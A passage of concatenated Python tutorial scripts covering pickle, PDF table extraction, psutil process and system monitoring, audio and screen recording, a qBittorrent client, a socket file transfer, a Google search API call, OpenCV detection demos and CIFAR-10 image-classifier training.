with open("person.pickle", "rb") as file:
    p2 = pickle.load(file)
print(p)
print(p2)
import pickle
class Person:
    """Simple person record used to demonstrate pickle.dumps/loads."""

    def __init__(self, first_name, last_name, age, gender):
        self.first_name = first_name
        self.last_name = last_name
        self.age = age
        self.gender = gender

    def __str__(self):
        # human-readable one-line summary
        full_name = f"{self.first_name} {self.last_name}"
        return f"<Person name={full_name}, age={self.age}, gender={self.gender}>"
# Same round-trip but via pickle.dumps()/loads() on raw bytes.
p = Person("John", "Doe", 99, "Male")
# get the dumped bytes
dumped_p = pickle.dumps(p)
print(dumped_p)
# write them to a file
with open("person.pickle", "wb") as file:
    file.write(dumped_p)
# load it
with open("person.pickle", "rb") as file:
    p2 = pickle.loads(file.read())
print(p)
print(p2)
# Extract tables from a PDF with camelot and export them to CSV/HTML.
# Usage: script.py <pdf-file>
import camelot
import sys
# PDF file to extract tables from (from command-line)
file = sys.argv[1]
# extract all the tables in the PDF file
tables = camelot.read_pdf(file)
# number of tables extracted
print("Total tables extracted:", tables.n)
# print the first table as Pandas DataFrame
print(tables[0].df)
# export individually
tables[0].to_csv("foo.csv")
# or export all in a zip
tables.export("foo.csv", f="csv", compress=True)
# export to HTML
tables.export("foo.html", f="html")
import psutil
from datetime import datetime
import pandas as pd
import time
import os
def get_size(bytes):
    """
    Returns size of bytes in a nice format, e.g. 1024 -> '1.00KB'.

    NOTE: the parameter name shadows the builtin `bytes`; kept for
    backward compatibility with any keyword callers.
    """
    for unit in ['', 'K', 'M', 'G', 'T', 'P']:
        if bytes < 1024:
            return f"{bytes:.2f}{unit}B"
        bytes /= 1024
    # values >= 1024 PB fell off the table and silently returned None
    # in the original; report them in exabytes instead
    return f"{bytes:.2f}EB"
def get_processes_info():
    """Collect one info dict per running process via psutil.

    Fields that require elevated privileges fall back to 0 / "N/A" on
    psutil.AccessDenied so the scan never aborts mid-way.
    """
    # the list that will contain all process dictionaries
    processes = []
    for process in psutil.process_iter():
        # get all process info in one shot (caches repeated lookups)
        with process.oneshot():
            # get the process id
            pid = process.pid
            if pid == 0:
                # System Idle Process for Windows NT, useless to see anyways
                continue
            # get the name of the file executed
            name = process.name()
            # get the time the process was spawned
            try:
                create_time = datetime.fromtimestamp(process.create_time())
            except OSError:
                # system processes, using boot time instead
                create_time = datetime.fromtimestamp(psutil.boot_time())
            try:
                # get the number of CPU cores that can execute this process
                cores = len(process.cpu_affinity())
            except psutil.AccessDenied:
                cores = 0
            # get the CPU usage percentage
            cpu_usage = process.cpu_percent()
            # get the status of the process (running, idle, etc.)
            status = process.status()
            try:
                # get the process priority (a lower value means a more prioritized process)
                nice = int(process.nice())
            except psutil.AccessDenied:
                nice = 0
            try:
                # get the memory usage in bytes (unique set size)
                memory_usage = process.memory_full_info().uss
            except psutil.AccessDenied:
                memory_usage = 0
            # total process read and written bytes
            io_counters = process.io_counters()
            read_bytes = io_counters.read_bytes
            write_bytes = io_counters.write_bytes
            # get the number of total threads spawned by this process
            n_threads = process.num_threads()
            # get the username of user spawned the process
            try:
                username = process.username()
            except psutil.AccessDenied:
                username = "N/A"
        processes.append({
            'pid': pid, 'name': name, 'create_time': create_time,
            'cores': cores, 'cpu_usage': cpu_usage, 'status': status, 'nice': nice,
            'memory_usage': memory_usage, 'read_bytes': read_bytes, 'write_bytes': write_bytes,
            'n_threads': n_threads, 'username': username,
        })
    return processes
def construct_dataframe(processes):
    """
    Build a display-ready pandas DataFrame from the process dicts.

    Relies on module-level globals assigned in __main__: `sort_by`,
    `descending` and `columns` (and `pd` -- presumably `import pandas as pd`
    earlier in the file, TODO confirm).
    """
    # convert to pandas dataframe
    df = pd.DataFrame(processes)
    # set the process id as index of a process
    df.set_index('pid', inplace=True)
    # sort rows by the column passed as argument
    df.sort_values(sort_by, inplace=True, ascending=not descending)
    # pretty printing bytes
    df['memory_usage'] = df['memory_usage'].apply(get_size)
    df['write_bytes'] = df['write_bytes'].apply(get_size)
    df['read_bytes'] = df['read_bytes'].apply(get_size)
    # convert to proper date format
    df['create_time'] = df['create_time'].apply(datetime.strftime, args=("%Y-%m-%d %H:%M:%S",))
    # reorder and define used columns
    df = df[columns.split(",")]
    return df
# CLI entry point: parse the display options, print a process table once,
# then optionally keep refreshing it every 0.7s when --live-update is set.
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Process Viewer & Monitor")
    parser.add_argument("-c", "--columns", help="""Columns to show,
    available are name,create_time,cores,cpu_usage,status,nice,memory_usage,read_bytes,write_bytes,n_threads,username.
    Default is name,cpu_usage,memory_usage,read_bytes,write_bytes,status,create_time,nice,n_threads,cores.""",
    default="name,cpu_usage,memory_usage,read_bytes,write_bytes,status,create_time,nice,n_threads,cores")
    parser.add_argument("-s", "--sort-by", dest="sort_by", help="Column to sort by, default is memory_usage .", default="memory_usage")
    parser.add_argument("--descending", action="store_true", help="Whether to sort in descending order.")
    parser.add_argument("-n", help="Number of processes to show, will show all if 0 is specified, default is 25 .", default=25)
    parser.add_argument("-u", "--live-update", action="store_true", help="Whether to keep the program on and updating process information each second")
    # parse arguments
    args = parser.parse_args()
    # these module-level names are read by construct_dataframe()
    columns = args.columns
    sort_by = args.sort_by
    descending = args.descending
    n = int(args.n)
    live_update = args.live_update
    # print the processes for the first time
    processes = get_processes_info()
    df = construct_dataframe(processes)
    if n == 0:
        print(df.to_string())
    elif n > 0:
        print(df.head(n).to_string())
    # print continuously
    while live_update:
        # get all process info
        processes = get_processes_info()
        df = construct_dataframe(processes)
        # clear the screen depending on your OS
        os.system("cls") if "nt" in os.name else os.system("clear")
        if n == 0:
            print(df.to_string())
        elif n > 0:
            print(df.head(n).to_string())
        time.sleep(0.7)
from playsound import playsound
import sys
# play the audio file given as the first CLI argument (blocking call)
playsound(sys.argv[1])
import pyaudio
import wave
import sys
# Play a WAV file (first CLI argument) by streaming it chunk by chunk
# through a PyAudio output stream.
filename = sys.argv[1]
# set the chunk size of 1024 samples
chunk = 1024
# open the audio file
wf = wave.open(filename, "rb")
# initialize PyAudio object
p = pyaudio.PyAudio()
# open stream object, taking format/channels/rate from the WAV header
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
                channels=wf.getnchannels(),
                rate=wf.getframerate(),
                output=True)
# read data in chunks
data = wf.readframes(chunk)
# writing to the stream (playing audio); readframes returns b"" at EOF,
# which is falsy and ends the loop
while data:
    stream.write(data)
    data = wf.readframes(chunk)
# close stream
stream.close()
p.terminate()
from pydub import AudioSegment
from pydub.playback import play
import sys
# Play an MP3 file (first CLI argument) with pydub; decoding relies on
# ffmpeg/libav being installed.
# read MP3 file
song = AudioSegment.from_mp3(sys.argv[1])
# song = AudioSegment.from_wav("audio_file.wav")
# you can also read from other formats such as MP4
# song = AudioSegment.from_file("audio_file.mp4", "mp4")
play(song)
import pyaudio
import wave
import argparse
# Record `--duration` seconds from the default microphone and save the
# result as a WAV file (`--output`).
parser = argparse.ArgumentParser(description="an Audio Recorder using Python")
parser.add_argument("-o", "--output", help="Output file (with .wav)", default="recorded.wav")
parser.add_argument("-d", "--duration", help="Duration to record in seconds (can be float)", default=5)
args = parser.parse_args()
# the file name output you want to record into
filename = args.output
# number of seconds to record
record_seconds = float(args.duration)
# set the chunk size of 1024 samples
chunk = 1024
# sample format
FORMAT = pyaudio.paInt16
# mono, change to 2 if you want stereo
channels = 1
# 44100 samples per second
sample_rate = 44100
# initialize PyAudio object
p = pyaudio.PyAudio()
# open stream object as input & output
stream = p.open(format=FORMAT,
                channels=channels,
                rate=sample_rate,
                input=True,
                output=True,
                frames_per_buffer=chunk)
frames = []
print("Recording...")
# number of chunks = samples needed / samples per chunk
# (was a hard-coded 44100; use sample_rate so changing the rate above
# keeps the recorded duration correct)
for i in range(int(sample_rate / chunk * record_seconds)):
    data = stream.read(chunk)
    # if you want to hear your voice while recording
    # stream.write(data)
    frames.append(data)
print("Finished recording.")
# stop and close stream
stream.stop_stream()
stream.close()
# terminate pyaudio object
p.terminate()
# save audio file
# open the file in 'write bytes' mode
wf = wave.open(filename, "wb")
# set the channels
wf.setnchannels(channels)
# set the sample format
wf.setsampwidth(p.get_sample_size(FORMAT))
# set the sample rate
wf.setframerate(sample_rate)
# write the frames as bytes
wf.writeframes(b"".join(frames))
# close the file
wf.close()
import cv2
import numpy as np
import pyautogui
# Record ~100 screenshots of the desktop into output.avi at 10 FPS.
# display screen resolution, get it from your OS settings
# NOTE(review): VideoWriter silently drops frames whose size differs from
# this tuple -- confirm it matches the actual screenshot resolution
SCREEN_SIZE = (1920, 1080)
# define the codec
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
# create the video write object (10.0 is the output frame rate)
out = cv2.VideoWriter("output.avi", fourcc, 10.0, (SCREEN_SIZE))
# while True:
for i in range(100):
    # make a screenshot
    img = pyautogui.screenshot()
    # convert these pixels to a proper numpy array to work with OpenCV
    frame = np.array(img)
    # pyautogui yields RGB pixels while VideoWriter expects BGR; this
    # swaps the channels (BGR2RGB and RGB2BGR are the same swap)
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    # write the frame
    out.write(frame)
    # show the frame
    # cv2.imshow("screenshot", frame)
    # if the user clicks q, it exits
    if cv2.waitKey(1) == ord("q"):
        break
# make sure everything is closed when exited
cv2.destroyAllWindows()
out.release()
import psutil
import platform
from datetime import datetime
def get_size(bytes, suffix="B"):
    """
    Scale bytes to its proper format
    e.g:
        1253656 => '1.20MB'
        1253656678 => '1.17GB'
    """
    factor = 1024
    for unit in ["", "K", "M", "G", "T", "P"]:
        if bytes < factor:
            return f"{bytes:.2f}{unit}{suffix}"
        bytes /= factor
    # values >= 1024 PB previously fell through and returned None;
    # report them in exabytes instead
    return f"{bytes:.2f}E{suffix}"
# Print a full hardware/OS report: platform info, boot time, CPU,
# memory + swap, disks, and network interfaces/IO (all via psutil).
print("="*40, "System Information", "="*40)
uname = platform.uname()
print(f"System: {uname.system}")
print(f"Node Name: {uname.node}")
print(f"Release: {uname.release}")
print(f"Version: {uname.version}")
print(f"Machine: {uname.machine}")
print(f"Processor: {uname.processor}")
# Boot Time
print("="*40, "Boot Time", "="*40)
boot_time_timestamp = psutil.boot_time()
bt = datetime.fromtimestamp(boot_time_timestamp)
print(f"Boot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}")
# let's print CPU information
print("="*40, "CPU Info", "="*40)
# number of cores
print("Physical cores:", psutil.cpu_count(logical=False))
print("Total cores:", psutil.cpu_count(logical=True))
# CPU frequencies
cpufreq = psutil.cpu_freq()
print(f"Max Frequency: {cpufreq.max:.2f}Mhz")
print(f"Min Frequency: {cpufreq.min:.2f}Mhz")
print(f"Current Frequency: {cpufreq.current:.2f}Mhz")
# CPU usage (interval=1 blocks for one second to sample usage)
print("CPU Usage Per Core:")
for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):
    print(f"Core {i}: {percentage}%")
print(f"Total CPU Usage: {psutil.cpu_percent()}%")
# Memory Information
print("="*40, "Memory Information", "="*40)
# get the memory details
svmem = psutil.virtual_memory()
print(f"Total: {get_size(svmem.total)}")
print(f"Available: {get_size(svmem.available)}")
print(f"Used: {get_size(svmem.used)}")
print(f"Percentage: {svmem.percent}%")
print("="*20, "SWAP", "="*20)
# get the swap memory details (if exists)
swap = psutil.swap_memory()
print(f"Total: {get_size(swap.total)}")
print(f"Free: {get_size(swap.free)}")
print(f"Used: {get_size(swap.used)}")
print(f"Percentage: {swap.percent}%")
# Disk Information
print("="*40, "Disk Information", "="*40)
print("Partitions and Usage:")
# get all disk partitions
partitions = psutil.disk_partitions()
for partition in partitions:
    print(f"=== Device: {partition.device} ===")
    print(f"  Mountpoint: {partition.mountpoint}")
    print(f"  File system type: {partition.fstype}")
    try:
        partition_usage = psutil.disk_usage(partition.mountpoint)
    except PermissionError:
        # this can be catched due to the disk that
        # isn't ready
        continue
    print(f"  Total Size: {get_size(partition_usage.total)}")
    print(f"  Used: {get_size(partition_usage.used)}")
    print(f"  Free: {get_size(partition_usage.free)}")
    print(f"  Percentage: {partition_usage.percent}%")
# get IO statistics since boot
disk_io = psutil.disk_io_counters()
print(f"Total read: {get_size(disk_io.read_bytes)}")
print(f"Total write: {get_size(disk_io.write_bytes)}")
# Network information
print("="*40, "Network Information", "="*40)
# get all network interfaces (virtual and physical)
if_addrs = psutil.net_if_addrs()
for interface_name, interface_addresses in if_addrs.items():
    for address in interface_addresses:
        print(f"=== Interface: {interface_name} ===")
        if str(address.family) == 'AddressFamily.AF_INET':
            print(f"  IP Address: {address.address}")
            print(f"  Netmask: {address.netmask}")
            print(f"  Broadcast IP: {address.broadcast}")
        elif str(address.family) == 'AddressFamily.AF_PACKET':
            print(f"  MAC Address: {address.address}")
            print(f"  Netmask: {address.netmask}")
            print(f"  Broadcast MAC: {address.broadcast}")
# get IO statistics since boot
net_io = psutil.net_io_counters()
print(f"Total Bytes Sent: {get_size(net_io.bytes_sent)}")
print(f"Total Bytes Received: {get_size(net_io.bytes_recv)}")
from qbittorrent import Client
# Connect to a local qBittorrent Web UI and start downloading a torrent.
# connect to the qbittorent Web UI
qb = Client("http://127.0.0.1:8080/")
# put the credentials (as you configured)
qb.login("admin", "adminadmin")
# open the torrent file of the file you wanna download
# NOTE(review): this handle is never closed -- consider a `with` block
torrent_file = open("debian-10.2.0-amd64-netinst.iso.torrent", "rb")
# start downloading
qb.download_from_file(torrent_file)
# this magnet is not valid, replace with yours
# magnet_link = "magnet:?xt=urn:btih:e334ab9ddd91c10938a7....."
# qb.download_from_link(magnet_link)
# you can specify the save path for downloads
# qb.download_from_file(torrent_file, savepath="/the/path/you/want/to/save")
# pause all downloads
qb.pause_all()
# resume them
qb.resume_all()
def get_size_format(b, factor=1024, suffix="B"):
    """
    Format a byte count with a binary-prefix unit.

    e.g. 1253656 => '1.20MB', 1253656678 => '1.17GB'.
    Values beyond the zetta range are reported with the 'Y' prefix.
    """
    value = b
    for prefix in ("", "K", "M", "G", "T", "P", "E", "Z"):
        if value < factor:
            return f"{value:.2f}{prefix}{suffix}"
        value /= factor
    return f"{value:.2f}Y{suffix}"
# List every torrent known to the client with seeds, size and speed.
# return list of torrents
torrents = qb.torrents()
for torrent in torrents:
    print("Torrent name:", torrent["name"])
    print("hash:", torrent["hash"])
    print("Seeds:", torrent["num_seeds"])
    print("File size:", get_size_format(torrent["total_size"]))
    print("Download speed:", get_size_format(torrent["dlspeed"]) + "/s")
# sample output:
# Torrent name: debian-10.2.0-amd64-netinst.iso
# hash: 86d4c80024a469be4c50bc5a102cf71780310074
# Seeds: 70
# File size: 335.00MB
# Download speed: 606.15KB/s
"""
Client that sends the file (uploads)
"""
import socket
import tqdm
import os
import argparse
# marker placed between filename and filesize in the transfer header
SEPARATOR = "<SEPARATOR>"
# number of bytes sent per socket write
BUFFER_SIZE = 1024 * 4
def send_file(filename, host, port):
    """
    Send `filename` over TCP to host:port.

    Protocol: one header of "<name><SEPARATOR><filesize>" followed by the
    raw file bytes. The matching receiver splits on SEPARATOR and saves
    under the basename of the sent name.
    """
    # get the file size
    filesize = os.path.getsize(filename)
    # create the client socket
    s = socket.socket()
    print(f"[+] Connecting to {host}:{port}")
    s.connect((host, port))
    print("[+] Connected.")
    # send the actual filename and filesize -- previously a literal
    # placeholder was sent here, so the receiver saved the data under a
    # bogus name
    s.send(f"{filename}{SEPARATOR}{filesize}".encode())
    # start sending the file
    progress = tqdm.tqdm(range(filesize), f"Sending {filename}", unit="B", unit_scale=True, unit_divisor=1024)
    with open(filename, "rb") as f:
        for _ in progress:
            # read the bytes from the file
            bytes_read = f.read(BUFFER_SIZE)
            if not bytes_read:
                # file transmitting is done
                break
            # we use sendall to assure transimission in
            # busy networks
            s.sendall(bytes_read)
            # update the progress bar
            progress.update(len(bytes_read))
    # close the socket
    s.close()
# CLI entry point: parse the file, host and port, then run the transfer.
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Simple File Sender")
    parser.add_argument("file", help="File name to send")
    parser.add_argument("host", help="The host/IP address of the receiver")
    # type=int: argparse yields strings for CLI-supplied values, and
    # socket.connect() requires (host, int) -- without the cast any
    # explicit --port crashed
    parser.add_argument("-p", "--port", type=int, help="Port to use, default is 5001", default=5001)
    args = parser.parse_args()
    filename = args.file
    host = args.host
    port = args.port
    send_file(filename, host, port)
"""
Server receiver of the file
"""
import socket
import tqdm
import os
# TCP server side of the transfer: accept one connection, read the
# "<name><SEPARATOR><size>" header, then stream the payload to disk.
# device's IP address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5001
# receive 4096 bytes each time
BUFFER_SIZE = 4096
SEPARATOR = "<SEPARATOR>"
# create the server socket
# TCP socket
s = socket.socket()
# bind the socket to our local address
s.bind((SERVER_HOST, SERVER_PORT))
# enabling our server to accept connections
# 5 here is the number of unaccepted connections that
# the system will allow before refusing new connections
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
# accept connection if there is any
client_socket, address = s.accept()
# if below code is executed, that means the sender is connected
print(f"[+] {address} is connected.")
# receive the file infos
# receive using client socket, not server socket
received = client_socket.recv(BUFFER_SIZE).decode()
filename, filesize = received.split(SEPARATOR)
# remove absolute path if there is
filename = os.path.basename(filename)
# convert to integer
filesize = int(filesize)
# start receiving the file from the socket
# and writing to the file stream
# NOTE(review): the progress label is a placeholder -- consider showing
# the received filename instead
progress = tqdm.tqdm(range(filesize), f"Receiving (unknown)", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
    for _ in progress:
        # read 1024 bytes from the socket (receive)
        bytes_read = client_socket.recv(BUFFER_SIZE)
        if not bytes_read:
            # nothing is received
            # file transmitting is done
            break
        # write to the file the bytes we just received
        f.write(bytes_read)
        # update the progress bar
        progress.update(len(bytes_read))
# close the client socket
client_socket.close()
# close the server socket
s.close()
import requests
import sys
# Query the Google Custom Search JSON API for the term passed on the
# command line and print the first page of results.
# get the API KEY here: https://developers.google.com/custom-search/v1/overview
API_KEY = "<INSERT_YOUR_API_KEY_HERE>"
# get your Search Engine ID on your CSE control panel
SEARCH_ENGINE_ID = "<INSERT_YOUR_SEARCH_ENGINE_ID_HERE>"
# the search query you want, from the command line
query = sys.argv[1]
# constructing the URL
# doc: https://developers.google.com/custom-search/v1/using_rest
url = f"https://www.googleapis.com/customsearch/v1?key={API_KEY}&cx={SEARCH_ENGINE_ID}&q={query}"
# make the API request
data = requests.get(url).json()
# get the result items (None when the API returns an error or no hits)
search_items = data.get("items")
# iterate over 10 results found
for i, search_item in enumerate(search_items, start=1):
    # get the page title
    title = search_item.get("title")
    # page snippet
    snippet = search_item.get("snippet")
    # alternatively, you can get the HTML snippet (bolded keywords)
    html_snippet = search_item.get("htmlSnippet")
    # extract the page url
    link = search_item.get("link")
    # print the results
    print("="*10, f"Result #{i}", "="*10)
    print("Title:", title)
    print("Description:", snippet)
    print("URL:", link, "\n")
import cv2
import matplotlib.pyplot as plt
import sys
# Detect and draw contours on an image: argv[1] = image path,
# argv[2] = binary threshold value.
# read the image
image = cv2.imread(sys.argv[1])
# convert to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# convert to grayscale
gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# create a binary thresholded image (inverted: dark pixels become white)
_, binary = cv2.threshold(gray, int(sys.argv[2]), 255, cv2.THRESH_BINARY_INV)
# show it
plt.imshow(binary, cmap="gray")
plt.show()
# find the contours from the thresholded image
contours, hierarchy = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# draw all contours (-1 = every contour) in green, 2px thick
image = cv2.drawContours(image, contours, -1, (0, 255, 0), 2)
# show the image with the drawn contours
plt.imshow(image)
plt.show()
import cv2
# Live contour detection from the default webcam; press 'q' to quit.
cap = cv2.VideoCapture(0)
while True:
    _, frame = cap.read()
    # convert to grayscale
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    # create a binary thresholded image (fixed threshold at mid-gray)
    _, binary = cv2.threshold(gray, 255 // 2, 255, cv2.THRESH_BINARY_INV)
    # find the contours from the thresholded image
    contours, hierarchy = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # draw all contours
    image = cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)
    # show the images
    cv2.imshow("gray", gray)
    cv2.imshow("image", image)
    cv2.imshow("binary", binary)
    if cv2.waitKey(1) == ord("q"):
        break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# Canny edge detection on the image given as argv[1].
# read the image
image = cv2.imread(sys.argv[1])
# convert it to grayscale
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# show the grayscale image, if you want to show, uncomment 2 below lines
# plt.imshow(gray, cmap="gray")
# plt.show()
# perform the canny edge detector to detect image edges
# (threshold1/threshold2 are the hysteresis low/high bounds)
edges = cv2.Canny(gray, threshold1=30, threshold2=100)
# show the detected edges
plt.imshow(edges, cmap="gray")
plt.show()
import numpy as np
import cv2
# Live Canny edge detection from the default webcam; press 'q' to quit.
cap = cv2.VideoCapture(0)
while True:
    _, frame = cap.read()
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    edges = cv2.Canny(gray, 30, 100)
    cv2.imshow("edges", edges)
    cv2.imshow("gray", gray)
    if cv2.waitKey(1) == ord("q"):
        break
cap.release()
cv2.destroyAllWindows()
import cv2
# Detect faces in a still image with a Haar cascade and save an annotated copy.
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
# fixed typo: OpenCV ships "haarcascade_frontalface_default.xml"
# ("frontalface", not "fontalface") -- the old path loaded no classifier
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_frontalface_default.xml")
# detect all the faces in the image (scaleFactor=1.3, minNeighbors=5)
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# print the number of faces detected
print(f"{len(faces)} faces detected in the image.")
# for every face, draw a blue rectangle
for x, y, width, height in faces:
    cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import cv2
# Live face detection from the default webcam; press 'q' to quit.
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
# fixed typo: OpenCV ships "haarcascade_frontalface_default.xml"
# ("frontalface", not "fontalface") -- the old path loaded no classifier
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_frontalface_default.xml")
while True:
    # read the image from the cam
    _, image = cap.read()
    # converting to grayscale
    image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # detect all the faces in the image
    faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
    # for every face, draw a blue rectangle
    for x, y, width, height in faces:
        cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
    cv2.imshow("image", image)
    if cv2.waitKey(1) == ord("q"):
        break
cap.release()
cv2.destroyAllWindows()
from train import load_data, batch_size
from tensorflow.keras.models import load_model
import matplotlib.pyplot as plt
import numpy as np
# Evaluate the saved CIFAR-10 model on the test split, then predict and
# display one sample image with its true/predicted class.
# CIFAR-10 classes (label index -> human-readable name)
categories = {
    0: "airplane",
    1: "automobile",
    2: "bird",
    3: "cat",
    4: "deer",
    5: "dog",
    6: "frog",
    7: "horse",
    8: "ship",
    9: "truck"
}
# load the testing set
# (_, _), (X_test, y_test) = load_data()
ds_train, ds_test, info = load_data()
# load the model with final model weights
model = load_model("results/cifar10-model-v1.h5")
# evaluation (steps bounds the repeated dataset to one pass)
loss, accuracy = model.evaluate(ds_test, steps=info.splits["test"].num_examples // batch_size)
print("Test accuracy:", accuracy*100, "%")
# get prediction for this image (first sample of the first test batch)
data_sample = next(iter(ds_test))
sample_image = data_sample[0].numpy()[0]
sample_label = categories[data_sample[1].numpy()[0]]
# reshape adds the batch dimension the model expects
prediction = np.argmax(model.predict(sample_image.reshape(-1, *sample_image.shape))[0])
print("Predicted label:", categories[prediction])
print("True label:", sample_label)
# show the first image
plt.axis('off')
plt.imshow(sample_image)
plt.show()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard
import tensorflow as tf
import tensorflow_datasets as tfds
import os
# hyper-parameters
# samples per gradient update
batch_size = 64
# 10 categories of images (CIFAR-10)
num_classes = 10
# number of training epochs
epochs = 30
def create_model(input_shape):
    """
    Constructs and compiles the CIFAR-10 CNN:
    - 32 Convolutional (3x3)
    - Relu
    - 32 Convolutional (3x3)
    - Relu
    - Max pooling (2x2)
    - Dropout
    - 64 Convolutional (3x3)
    - Relu
    - 64 Convolutional (3x3)
    - Relu
    - Max pooling (2x2)
    - Dropout
    - 128 Convolutional (3x3)
    - Relu
    - 128 Convolutional (3x3)
    - Relu
    - Max pooling (2x2)
    - Dropout
    - Flatten (To make a 1D vector out of convolutional layers)
    - 1024 Fully connected units
    - Relu
    - Dropout
    - 10 Fully connected units (each corresponds to a label category (cat, dog, etc.))

    Returns the compiled keras Sequential model (sparse categorical
    cross-entropy loss, Adam optimizer).
    """
    # building the model
    model = Sequential()
    model.add(Conv2D(filters=32, kernel_size=(3, 3), padding="same", input_shape=input_shape))
    model.add(Activation("relu"))
    model.add(Conv2D(filters=32, kernel_size=(3, 3), padding="same"))
    model.add(Activation("relu"))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Dropout(0.25))
    model.add(Conv2D(filters=64, kernel_size=(3, 3), padding="same"))
    model.add(Activation("relu"))
    model.add(Conv2D(filters=64, kernel_size=(3, 3), padding="same"))
    model.add(Activation("relu"))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Dropout(0.25))
    model.add(Conv2D(filters=128, kernel_size=(3, 3), padding="same"))
    model.add(Activation("relu"))
    model.add(Conv2D(filters=128, kernel_size=(3, 3), padding="same"))
    model.add(Activation("relu"))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Dropout(0.25))
    # flattening the convolutions
    model.add(Flatten())
    # fully-connected layers
    model.add(Dense(1024))
    model.add(Activation("relu"))
    model.add(Dropout(0.5))
    model.add(Dense(num_classes, activation="softmax"))
    # print the summary of the model architecture
    model.summary()
    # training the model using adam optimizer
    model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
    return model
def load_data():
    """
    This function loads CIFAR-10 dataset, and preprocess it.

    Returns (ds_train, ds_test, info): two infinitely-repeating, shuffled,
    batched tf.data pipelines with pixel values scaled to [0, 1], plus the
    tfds DatasetInfo object.
    """
    # Loading data using Keras
    # loading the CIFAR-10 dataset, splitted between train and test sets
    # (X_train, y_train), (X_test, y_test) = cifar10.load_data()
    # print("Training samples:", X_train.shape[0])
    # print("Testing samples:", X_test.shape[0])
    # print(f"Images shape: {X_train.shape[1:]}")
    # # converting image labels to binary class matrices
    # y_train = to_categorical(y_train, num_classes)
    # y_test = to_categorical(y_test, num_classes)
    # # convert to floats instead of int, so we can divide by 255
    # X_train = X_train.astype("float32")
    # X_test = X_test.astype("float32")
    # X_train /= 255
    # X_test /= 255
    # return (X_train, y_train), (X_test, y_test)
    # Loading data using Tensorflow Datasets
    def preprocess_image(image, label):
        # convert [0, 255] range integers to [0, 1] range floats
        image = tf.image.convert_image_dtype(image, tf.float32)
        return image, label
    # loading the CIFAR-10 dataset, splitted between train and test sets
    ds_train, info = tfds.load("cifar10", with_info=True, split="train", as_supervised=True)
    ds_test = tfds.load("cifar10", split="test", as_supervised=True)
    # repeat dataset forever, shuffle, preprocess, split by batch
    # (repeat() means consumers must bound iteration with steps_per_epoch)
    ds_train = ds_train.repeat().shuffle(1024).map(preprocess_image).batch(batch_size)
    ds_test = ds_test.repeat().shuffle(1024).map(preprocess_image).batch(batch_size)
    return ds_train, ds_test, info
# Training entry point: build the model, train on the tf.data pipelines
# with TensorBoard logging, and save the final weights.
if __name__ == "__main__":
    # load the data
    ds_train, ds_test, info = load_data()
    # (X_train, y_train), (X_test, y_test) = load_data()
    # constructs the model
    # model = create_model(input_shape=X_train.shape[1:])
    model = create_model(input_shape=info.features["image"].shape)
    # some nice callbacks
    logdir = os.path.join("logs", "cifar10-model-v1")
    tensorboard = TensorBoard(log_dir=logdir)
    # make sure results folder exist
    if not os.path.isdir("results"):
        os.mkdir("results")
    # train
    # model.fit(X_train, y_train,
    #           batch_size=batch_size,
    #           epochs=epochs,
    #           validation_data=(X_test, y_test),
    #           callbacks=[tensorboard, checkpoint],
    #           shuffle=True)
    # steps_per_epoch / validation_steps are required because the
    # datasets repeat forever
    model.fit(ds_train, epochs=epochs, validation_data=ds_test, verbose=1,
              steps_per_epoch=info.splits["train"].num_examples // batch_size,
              validation_steps=info.splits["test"].num_examples // batch_size,
              callbacks=[tensorboard])
    # save the model to disk
    model.save("results/cifar10-model-v1.h5")
from train import load_data, create_model, IMAGE_SHAPE, batch_size, np
import matplotlib.pyplot as plt
# Evaluate the fine-tuned flower classifier and plot a batch of
# predictions, coloring titles blue (correct) or red (wrong).
# load the data generators
train_generator, validation_generator, class_names = load_data()
# constructs the model
model = create_model(input_shape=IMAGE_SHAPE)
# load the optimal weights
model.load_weights("results/MobileNetV2_finetune_last5_less_lr-loss-0.45-acc-0.86.h5")
validation_steps_per_epoch = np.ceil(validation_generator.samples / batch_size)
# print the validation loss & accuracy
evaluation = model.evaluate_generator(validation_generator, steps=validation_steps_per_epoch, verbose=1)
print("Val loss:", evaluation[0])
print("Val Accuracy:", evaluation[1])
